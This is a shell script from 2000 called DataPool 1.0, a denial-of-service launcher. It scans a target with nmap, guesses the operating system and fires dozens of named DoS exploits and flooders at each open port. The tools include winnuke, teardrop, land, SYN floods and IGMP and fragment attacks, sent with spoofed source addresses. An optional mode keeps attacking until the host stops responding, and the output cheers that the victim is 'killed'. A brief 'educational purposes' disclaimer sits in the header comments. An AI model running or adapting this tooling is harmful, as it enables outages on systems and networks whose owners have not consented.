#!/bin/ksh
#March 27, 2000-
#Been workin on it some more...lots more shit, dunno exaclty what...uhhh
#c-class ip attacks...(i wouldn't recommend it) oh and lemme give a disclaimer:
#I didn't use this script on any computer outside my personal network on a
#testing basis to check the vulnerabilities of my system.  You should not use
#this program for malicious use, becuz if u do it's you're fault, not mine.
#Actually if u do use it you're a loser becuz u didn't write it yourself=P heh
#if ya got probs with the script, mail me at spender@exterminator.net
#oh...new options too...check em out
#btw...please don't abuse the script...i wrote it for educational purposes...=\
#
#March 25, 2000-
#Many improvements...new options like port range and "don't stop till they drop"
#(heh love that one=P) future options might include a setting where further
#attacks are longer and harder...numofattacks + n =P this script can be run
# without any user intervention whatsoever.  Even attacks that would normally
#require intervention are handled correctly in this program...(eat your heart
#out spikeman=] )  Oh, and there's 69 attacks...that's right, SIXTY-NINE=] 
#(my fav # =P )trying to add more but some are a bitch to compile=\
#Hope you enjoy! -spender
#
#Greetz-
#Gridmark, spyropyro(muh gf=P), the ss programming teeem heh=P, vetesgirl cuz
#she's so nice, not the stupid swedish jerk on efnet with nick spender who keeps
#taking it from me=P, all the people who coded the shit used in my script
#
#If y'all are bored go watch some anime(I recommend Grave of the Fireflies...
#*sniff =[ ) l8tz
#
#BTW: this script requires nmap....so pick yourself up a copy and compile it...
#then copy it to either /usr/bin, /usr/local/bin, or in the ./bin directory of
#where this script is. (I can't do everything for you=])
clear
DONTSTOP=0
SCANONLY=0
function usage {
echo "Usage: $0 [-p] [portlow-porthigh] [-x] [-v] [logfile]"
echo " [-d] [destination ip] [-s]"
echo "Options:"
echo "[-d]: specifies destination IP: REQUIRED"
echo "[-p]:specifies port range to scan.  ex: -p 1-1024"
echo "[-x]: \"Don't stop till they drop\""
echo "[-v]:logs results of scan to file.  ex: -v logfile.log"
echo "[-s]: Scan ports only."
exit 1
}

if [ $# -lt 2 ]; then
usage
fi
LOGFILE=
PORTLIST=
while getopts p:v:d:xs OPTION ; do
    case "$OPTION" in
    p) PORTLIST="$OPTARG" ;;
    v) LOGFILE="$OPTARG" ;;
    x) DONTSTOP=1 ;;
    d) DESTIP="$OPTARG" ;;
    s) SCANONLY=1 ;;
   \?) usage ;;
   esac
   
done
if [ "$PORTLIST" = " " ]; then
PORTLIST=
elif [ "$LOGFILE" = " " ]; then
LOGFILE=
fi
if [ -f ./output.txt ]; then
rm -rf ./output.txt
fi
if [ "$DESTIP" = "" ] || [ "$DESTIP" = "" ]; then
usage
fi
if [ -f /usr/local/bin/nmap ]; then
    NMAPDIR="/usr/local/bin/nmap"
elif [ -f /usr/bin/nmap ]; then
	NMAPDIR="/usr/bin/nmap"
elif [ -f ./bin/nmap ]; then
	    NMAPDIR="./bin/nmap"
else
	    echo "NMAP not found, or not placed in either /usr/local/bin or /usr/bin."
	    echo "Please copy NMAP to either directory and run this script again." 
    exit 1

fi


if [ "$PORTLIST" = "" ]; then
PORTLIST="1-65535"
fi
echo "                           ______________                              "
echo "                          |              |                             "
echo "--==----------------------|----------------------------------------==--"
echo " |                   ---==| DataPool 1.0 |==---                      | "
echo "--==-------------------------------------|-------------------------==--"
echo "                          |______________|                             "
RANDOM1=$RANDOM
RANDOM2=$RANDOM
RANDOM3=$RANDOM
RANDOM4=$RANDOM
RANDOM1=`echo "$RANDOM1" | cut -b-2`
RANDOM2=`echo "$RANDOM2" | cut -b-2`
RANDOM3=`echo "$RANDOM3" | cut -b-2`
RANDOM4=`echo "$RANDOM4" | cut -b-2`
SRCIP=`echo "$RANDOM1.$RANDOM2.$RANDOM3.$RANDOM4"`

function DONTSTOPPER {
ping=`ping -c5 $DESTIP | grep 100%`
	        
if [ "$ping" = "5 packets transmitted, 0 packets received, 100% packet loss" ]; then
        echo "Good job! You killed him=]"
	if [ -n "$LOGFILE" ]; then
	echo "Dropped." >> ./$LOGFILE
	fi
	exit 0

else
        echo "Continuing attack...he's not dead yet..."
	COUNTER1=1
        OUTPUT=`cat ./output.txt -n | grep $COUNTER1 -w | cut -b8-`
fi
}
function pingtest {
ping=`ping -c3 $DESTIP | grep 100%`
	        
if [ "$ping" = "3 packets transmitted, 0 packets received, 100% packet loss" ]; then
        echo "Good job! You killed him=]"
	if [ -n "$LOGFILE" ]; then
	echo "Dropped." >> ./$LOGFILE
	fi
	exit 0
fi
}

function jaypee {
 echo "Running Windows attack (jaypee)..."
 ./bin/jaypee $DESTIP 1>/dev/null 2>/dev/null
}
function udpflood {
 echo "Running UDP flooder (udpflood)..."
 ./bin/udpflood $SRCIP $DESTIP 200 1>dev/null 2>/dev/null
}
function rcon {
 echo "Running Quake server exploit (rcon)..."
 ./bin/rcon $DESTIP "say Die Fucker!" $OUTPUT 1>/dev/null 2>/dev/null
}
function arnup100 {
 echo "Running UDP datagram attack (arnup100)..."
 ./bin/arnup100 $SRCIP $OUTPUT $DESTIP $OUTPUT 1>/dev/null 2>/dev/null
 
}
function onetwothreefour {
 echo "Running ICMP attack (1234)..."
 ./bin/1234 $SRCIP $DESTIP 30 1>/dev/null 2>/dev/null
 
}
function opentear {
 echo "Running UDP attack (opentear)..."
 ./bin/opentear $DESTIP 0 0 1>/dev/null 2>/dev/null &
 sleep 15
 JOBNUM=`jobs | grep opentear -w | cut -d] -f1 | cut -b2-`
 kill %$JOBNUM 1>/dev/null 2>/dev/null
}
function raped {
 echo "Running TCP storm attack (raped)..."
 ./bin/raped $DESTIP $OUTPUT 1>/dev/null 2>/dev/null &
 sleep 15
 JOBNUM=`jobs | grep raped -w | cut -d] -f1 | cut -b2-`
 kill %$JOBNUM 1>/dev/null 2>/dev/null
}
function stream {
 echo "Running TCP storm attack (stream)..."
 ./bin/stream $DESTIP $OUTPUT 0 1>/dev/null 2>/dev/null &
 sleep 15
 JOBNUM=`jobs | grep stream -w | cut -d] -f1 | cut -b2-`
 kill %$JOBNUM 1>/dev/null 2>/dev/null
 
}
function doslinux {
 echo "Running DoS-Linux..."
 perl bin/DoS-Linux.pl -t $DESTIP 1>/dev/null 2>/dev/null
 
}
function ascendfoo {
 echo "Running ICMP echo attack (ascend-foo)..."
 ./bin/ascend-foo $DESTIP 64 1>/dev/null 2>/dev/null
 
}
function beer {
 echo "Running general attack (beer)..."
 ./bin/beer $DESTIP 40 1>/dev/null 2>/dev/null
 
}
function biffit {
 echo "Running UDP attack (biffit)..."
 ./bin/biffit $DESTIP root 1>/dev/null 2>/dev/null
 
}
function bloop {
 echo "Running ICMP flooder (bloop)..."
 ./bin/bloop $SRCIP $DESTIP 50 1>/dev/null 2>/dev/null
 
} 
function boink {
 echo "Running IP fragment attack (boink)..."
 ./bin/boink $SRCIP $DESTIP $OUTPUT $OUTPUT 40 1>/dev/null 2>/dev/null
 echo "Running IP fragment attack (bonk)..."
 ./bin/bonk $SRCIP $DESTIP 40 1>/dev/null 2>/dev/null

}
function coke {
 echo "Running UDP flooder (coke)..."
 ./bin/coke $DESTIP 100 1>/dev/null 2>/dev/null

}
function conseal {
 echo "Running Conseal PC firewall attack..."
 ./bin/conseal $DESTIP 20000 1>/dev/null 2>/dev/null

}
function echok {
 echo "Running ICMP ping flooder (echok)..."
 ./bin/echok -f -n 100 -w 1 $SRCIP $DESTIP 1>/dev/null 2>/dev/null

}  
function fawx {
 echo "Running IGMP attack (fawx)..."
 ./bin/fawx $SRCIP $DESTIP 30 1>/dev/null 2>/dev/null

}
function foqerc {
 echo "Running flooder (foqerc)..."
 ./bin/foqerc $DESTIP root 1>/dev/null 2>/dev/null

}
function galt_gin {
 echo "Running modem resetter (galt_gin)..."
 ./bin/galt_gin -m ATDT411 $DESTIP 1>/dev/null 2>/dev/null

}
function gewse {
  echo "Running identd flooder (gewse)..."
  ./bin/gewse $DESTIP 40 1>/dev/null 2>/dev/null

  echo "Running identd flooder (gewse5)..."
  ./bin/gewse5 $DESTIP 40 1>/dev/null 2>/dev/null

}
function hanson {
 echo "Running mIRC exploit (hanson)..."
 ./bin/hanson $DESTIP $OUTPUT 1>/dev/null 2>/dev/null

} 
function jolt {
 echo "Running IP fragment attack (jolt)..."
 ./bin/jolt $DESTIP $SRCIP 50 1>/dev/null 2>/dev/null

}
function kkill {
 echo "Running inetd flooder (kkill)..."
 ./bin/kkill $DESTIP $OUTPUT 1>/dev/null 2>/dev/null

}
function igmp {
 echo "Running IGMP attack (koc)..."
 ./bin/koc $DESTIP -p $OUTPUT -t 15 1>/dev/null 2>/dev/null

 echo "Running IGMP attack (kod)..."
 ./bin/kod $DESTIP -p $OUTPUT -t 15 1>/dev/null 2>/dev/null

 echo "Running IGMP attack (kox)..."
 ./bin/kox $DESTIP 1>/dev/null 2>/dev/null
 ./bin/kox $DESTIP 1>/dev/null 2>/dev/null

}
function inetddos {
 echo "Running inetd attack (inetd.DoS)..."
 ./bin/inetd.DoS $DESTIP $OUTPUT 500 1>/dev/null 2>/dev/null

}
function land {
 echo "Running TCP exploit attack (land)..."
 ./bin/land $DESTIP $OUTPUT 1>/dev/null 2>/dev/null

 echo "Running TCP exploit attack (La Tierra)..."
 ./bin/latierra -i $DESTIP -b $OUTPUT -e $OUTPUT -p 6 -m 4 -t f -o 1 -l 2 1>/dev/null 2>/dev/null
 ./bin/latierra -i $DESTIP -b $OUTPUT -e $OUTPUT -p 6 -m 4 -t s -o 1 -l 2 1>/dev/null 2>/dev/null
 ./bin/latierra -i $DESTIP -b $OUTPUT -e $OUTPUT -p 17 -m 4 -t a -o 1 -l 2 1>/dev/null 2>/dev/null
 ./bin/latierra -i $DESTIP -b $OUTPUT -e $OUTPUT -p 17 -m 4 -t r -o 1 -l 2 1>/dev/null 2>/dev/null

}
function misfrag {
 echo "Running TCP fragment attack (misfrag)..."
 ./bin/misfrag $SRCIP $OUTPUT $DESTIP $OUTPUT 200 1>/dev/null 2>/dev/null

}
function moyari13 {
 echo "Running ICMP attack (moyari13)..."
 ./bin/moyari13 $DESTIP 30 1>/dev/null 2>/dev/null

}
function mutilate {
 echo "Running port flooder (mutilate)..."
 ./bin/mutilate $DESTIP $OUTPUT 1>/dev/null 2>/dev/null
 ./bin/mutilate $DESTIP $OUTPUT 1>/dev/null 2>/dev/null

}
function nestea {
 echo "Running IP fragment attack (nestea)..."
 ./bin/nestea $SRCIP $DESTIP -s $OUTPUT -t $OUTPUT -n 100 1>/dev/null 2>/dev/null

}
function newtear {
 echo "Running IP fragment attack (newtear)..."
 ./bin/newtear $SRCIP $DESTIP -s $OUTPUT -t $OUTPUT -n 100 1>/dev/null 2>/dev/null

 echo "Running IP fragment attack (teardrop)..."
 ./bin/teardrop $SRCIP $DESTIP -s $OUTPUT -t $OUTPUT -n 100 1>/dev/null 2>/dev/null

}
function orgasm {
 echo "Running port flooder (orgasm)..."
 ./bin/orgasm $DESTIP $OUTPUT $OUTPUT 50 1>/dev/null 2>/dev/null

}
function overdrop {
 echo "Running IP fragment attack (overdrop)..."
 ./bin/overdrop $DESTIP -n 50 -s $SRCIP 1>/dev/null 2>/dev/null

}
function pepsi {
 echo "Running UDP flooder (pepsi)..."
 ./bin/pepsi -s $SRCIP -n 200 -p 1024 -d $OUTPUT -o $OUTPUT -w 1 $DESTIP 1>/dev/null 2>/dev/null

}
function pimp {
 echo "Running IGMP attack (pimp)..."
 ./bin/pimp $DESTIP 1>/dev/null 2>/dev/null

 echo "Running IGMP attack (pimp2)..."
 ./bin/pimp2 $DESTIP 30 $SRCIP 31 1 1>/dev/null 2>/dev/null

}
function pirchslap {
 echo "Running pirchslap exploit (pirchslap)..."
 ./bin/pirchslap $DESTIP 1>/dev/null 2>/dev/null

}
function pong {
 echo "Running ICMP flooder (pong)..."
 ./bin/pong -fV -c 30 $DESTIP $SRCIP 1>/dev/null 2>/dev/null

}       
function rape {
 echo "Running flooder (rape)..."
 ./bin/rape $DESTIP $OUTPUT 50 1>/dev/null 2>/dev/null

}
function rc8 {
 echo "Running UDP flooder (rc8)..."
 ./bin/rc8 $SRCIP $DESTIP 100 1>/dev/null 2>/dev/null

}
function spiffit {
 echo "Running UDP attack (spiffit)..."
 ./bin/spiffit $SRCIP $DESTIP $DESTIP root 100 1>/dev/null 2>/dev/null

}
function stuffit {
 echo "Running ping attack (stuffit)..."
 ./bin/stuffit $DESTIP 1024 7e 100 1>/dev/null 2>/dev/null
 ./bin/stuffit $DESTIP 1024 7d 100 1>/dev/null 2>/dev/null

} 
function ssping {
 echo "Running oversized ping attack (ssping)..."
 ./bin/ssping $SRCIP $DESTIP 100 1>/dev/null 2>/dev/null

}
function syndrop {
 echo "Running TCP SYN attack (syndrop)..."
 ./bin/syndrop $SRCIP $DESTIP -s $OUTPUT -t $OUTPUT -n 100 1>/dev/null 2>/dev/null

}
function synflood {
 echo "Running SYN flooder (synful)..."
 ./bin/synful $DESTIP 1>/dev/null 2>/dev/null
 ./bin/synful $DESTIP 1>/dev/null 2>/dev/null

 echo "Running SYN flooder (synhose)..."
 ./bin/synhose $DESTIP $OUTPUT 2000 1>/dev/null 2>/dev/null &

 echo "Running SYN flooder (synk)..."
 ./bin/synk 0 $DESTIP $OUTPUT $OUTPUT 1>/dev/null 2>/dev/null &
 sleep 15
 JOBNUM=`jobs | grep synk -w | cut -d] -f1 | cut -b2-`
 kill %$JOBNUM 1>/dev/null 2>/dev/null

 echo "Running SYN flooder (synk4)..."
 ./bin/synk4 0 $DESTIP $OUTPUT $OUTPUT 1>/dev/null 2>/dev/null &
 sleep 15
 JOBNUM=`jobs | grep synk4 -w | cut -d] -f1 | cut -b2-`
 kill %$JOBNUM 1>/dev/null 2>/dev/null

}
function targa {
 echo "Running combo attack (targa)..."
 ./bin/targa $DESTIP $DESTIP -t 0 -n 3 1>/dev/null 2>/dev/null

 echo "Running combo attack (targa2)..."
 ./bin/targa2 $DESTIP $DESTIP -t 0 -n 3 1>/dev/null 2>/dev/null

 echo "Running packet generator (targa3)..."
 ./bin/targa3 $DESTIP -c 5 1>/dev/null 2>/dev/null

}
function trash {
 echo "Running ICMP flooder (trash)..."
 ./bin/trash $SRCIP $DESTIP 70 1>/dev/null 2>/dev/null
 
 echo "Running ICMP flooder (trash2)..."
 ./bin/trash2 $DESTIP 70 1>/dev/null 2>/dev/null
 
}
function twinge {
 echo "Running ICMP flooder (twinge)..."
 ./bin/twinge $DESTIP 100 1>/dev/null 2>/dev/null

}
function udpdata {
 echo "Running UDP flooder (udpdata)..."
 ./bin/udpdata $SRCIP $OUTPUT $DESTIP $OUTPUT 1>/dev/null 2>/dev/null

}
function winfreez {
 echo "Running ICMP flooder (winfreez)..."
 ./bin/winfreez $DESTIP $SRCIP 10 1>/dev/null 2>/dev/null

}
function winnuke {
 echo "Running OOB nuker (winnuke)..."
 ./bin/winnuke $DESTIP 1>/dev/null 2>/dev/null

 echo "Running OOB nuker (killwin)..."
 ./bin/killwin $DESTIP -p $OUTPUT -t 10 1>/dev/null 2>/dev/null

}
function wingatecrash {
 echo "Running wingate crasher (wingatecrasher)..."
 ./bin/wingatecrasher $DESTIP $OUTPUT 1>/dev/null 2>/dev/null

}
function flushot {
 echo "Running flooder (flushot)..."
 ./bin/flushot $SRCIP $DESTIP 100 1>/dev/null 2>/dev/null

}
function FullAttack {
 igmp
 pingtest
 moyari13
 pingtest
 arnup100
 pingtest
 galt_gin
 pingtest
 hanson
 pingtest
 pirchslap
 pingtest
 twinge
 pingtest
 inetddos
 pingtest
 onetwothreefour
 pingtest
 doslinux
 pingtest
 ascendfoo
 pingtest
 beer
 pingtest
 biffit
 pingtest
 boink
 pingtest
 bloop
 pingtest
 coke
 pingtest
 conseal
 pingtest
 echok
 pingtest
 fawx
 pingtest
 foqerc
 pingtest
 gewse
 pingtest
 jaypee
 pingtest
 jolt
 pingtest
 kkill
 pingtest
 killwin
 pingtest
 land
 pingtest
 misfrag
 pingtest
 mutilate
 pingtest
 nestea
 pingtest
 newtear
 pingtest
 orgasm
 pingtest
 pepsi
 pingtest
 pimp
 pingtest
 pong
 pingtest
 rape
 pingtest
 rcon
 pingtest
 rc8
 pingtest
 spiffit
 pingtest
 ssping
 pingtest
 stuffit
 pingtest
 syndrop
 pingtest
 synflood
 pingtest
 trash
 pingtest
 udpdata
 pingtest
 udpflood
 pingtest
 winfreez
 pingtest
 wingatecrash
 pingtest
 winnuke
 pingtest
 flushot
 pingtest
 opentear
 pingtest
 raped
 pingtest
 stream
 pingtest
 targa
} 

function LinuxAttack {
 trash
 pingtest
 syndrop
 pingtest
 synflood
 pingtest
 spiffit
 pingtest
 biffit
 pingtest
 galt_gin
 pingtest
 twinge
 pingtest
 arnup100
 pingtest
 inetddos
 pingtest
 echok
 pingtest
 doslinux
 pingtest
 nestea 
 pingtest
 orgasm
 pingtest
 newtear
 pingtest
 foqerc 
 pingtest
 pong
 pingtest
 rc8
 pingtest
 stuffit
 pingtest
 coke
 pingtest
 ascendfoo
 pingtest
 beer
 pingtest
 pepsi
 pingtest
 udpdata
 pingtest
 udpflood
 pingtest
 opentear
 pingtest
 stream
 pingtest
 raped
 pingtest
 targa 
}

function BSDAttack {
 overdrop
 pingtest
 newtear
 pingtest
 land
 pingtest
 echok
 pingtest
 biffit
 pingtest
 spiffit
 pingtest
 coke
 pingtest
 beer
 pingtest
 udpdata
 pingtest
 udpflood
 pingtest
 twinge
 pingtest
 arnup100
 pingtest
 trash
 pingtest
 pepsi  
 pingtest
 rc8
 pingtest
 stuffit
 pingtest
 pong
 pingtest
 syndrop 
 pingtest
 opentear
 pingtest
 raped
 pingtest
 stream
 pingtest
 synflood
 pingtest
 targa
}

function WinAttack {
 jaypee
 pingtest
 winfreez
 pingtest
 winnuke 
 pingtest
 killwin
 pingtest
 rape
 pingtest
 orgasm
}

function WinNTAttack {
 igmp
 pingtest
 moyari13
 pingtest
 bloop
 pingtest
 twinge
 pingtest
 galt_gin
 pingtest
 arnup100
 pingtest
 hanson
 pingtest
 pirchslap
 pingtest
 pimp
 pingtest
 trash
 pingtest
 conseal
 pingtest
 jolt   
 pingtest
 boink
 pingtest
 echok
 pingtest
 newtear
 pingtest
 land
 pingtest
 conseal
 pingtest
 misfrag
 pingtest
 nestea
 pingtest
 syndrop
 pingtest
 synflood
 pingtest
 rcon
 pingtest
 coke
 pingtest
 pepsi
 pingtest
 pong
 pingtest
 rc8
 pingtest
 stuffit
 pingtest
 ssping
 pingtest
 udpdata
 pingtest
 udpflood
 pingtest
 onetwothreefour
 pingtest
 wingatecrash
 pingtest
 flushot
 pingtest
 opentear
 pingtest
 raped
 pingtest
 stream
 pingtest
 targa
}
COUNTER1=1
echo "Checking to see if $DESTIP is alive ..."
        ping=`ping -c5 $DESTIP | grep 100%`
	        
if [ "$ping" = "5 packets transmitted, 0 packets received, 100% packet loss" ]; then
        echo "Host is unavailable, exiting..."
	exit 1
else
        echo "Host is alive, starting portscan..."
	if [ -n "$LOGFILE" ]; then
	    echo "$DESTIP" >> ./$LOGFILE
	fi   
fi


${NMAPDIR} -P0 -O -p $PORTLIST $DESTIP 1> ./output.txt 2> ./output.txt
PORTOUTPUT=`cat ./output.txt`
OS=`cat ./output.txt | grep "Remote operating system"`
cat ./output.txt | grep open -w | grep tcp -w | cut -b-8 1>./output.txt 2> ./output.txt
OUTPUT=`cat ./output.txt -n | grep 1 -w | cut -b-8`
if [ "$OUTPUT" = "" ]; then
if [ -n "$LOGFILE" ]; then
echo "No Ports" >> ./$LOGFILE
fi
    
echo "No ports found to attack.  Exiting..."
    exit 1
fi

OSCHECK=`echo "$OS" | grep "Windows NT" -w`
if [ "$OSCHECK" = "" ]; then
    OSCHECK=`echo "$OS" | grep "Windows" -w`
    if [ "$OSCHECK" = "" ]; then
	OSCHECK=`echo "$OS" | grep Linux -w`
	if [ "$OSCHECK" = "" ]; then
	OSCHECK=`echo "$OS" | grep BSD -w`
	    if [ "$OSCHECK" = "" ]; then
		OS="All"
	    else
		OS="BSD"
	    fi
	else
	OS="Linux"
	fi
    else
    OS="Windows 9x"
    fi
else
OS="Windows NT"
fi 
if [ -n "$LOGFILE" ]; then
echo "$OS" >> ./$LOGFILE
fi
OUTPUTLIST=`cat ./output.txt`
NUMPORTS=`cat ./output.txt | wc -w | cut -b7-`
if [ -n "$LOGFILE" ]; then
echo "$OUTPUTLIST" >> ./$LOGFILE
fi
if [ "$SCANONLY" = "1" ]; then
echo "Scan of $DESTIP complete."
exit 0
fi
case $OS in
    "Linux")
    echo "Linux host detected..."
    ;;
    "Windows 9x")
    echo "Windows 9x/NT/2000 host detected..."
    ;;
    "Windows NT")
    echo "Windows NT host detected..."
    ;;
    "BSD")
    echo "BSD host detected..."
    ;;
    "All")
    echo "OS could not be detected. Running all attacks..."
    ;;
esac    

echo "$NUMPORTS TCP port(s) were found open:"
echo "$OUTPUTLIST"
while true ; do

    OUTPUT=`cat ./output.txt -n | grep $COUNTER1 -w | cut -b8-`
    if [ "$OUTPUT" = "" ]; then
    if [ "$DONTSTOP" = "1" ]; then
    DONTSTOPPER
    fi
    fi

    if [ "$OUTPUT" = "" ]; then
    echo "Attack Complete!"
    echo "Checking to see if $DESTIP is still alive ..."
        ping=`ping -c5 $DESTIP | grep 100%`
	        
if [ "$ping" = "5 packets transmitted, 0 packets received, 100% packet loss" ]; then
        echo "Good job!  You've killed him=]"
	if [ -n "$LOGFILE" ]; then
	echo "Dropped." >> ./$LOGFILE
	fi
	exit 0
else
        echo "He's still alive=\ You might wanna try again..."
	exit 1
fi
    else 
    echo "Attacking $DESTIP on port: $OUTPUT"
    case $OS in
    "Linux")
    LinuxAttack
    ;;
    "Windows 9x")
    WinNTAttack
    WinAttack
    ;;
    "Windows NT")
    WinNTAttack
    ;;
    "BSD")
    BSDAttack
    ;;
    "All")
    FullAttack
    ;;
esac    
fi    
    	
COUNTER1=`expr $COUNTER1 + 1`
done     	 
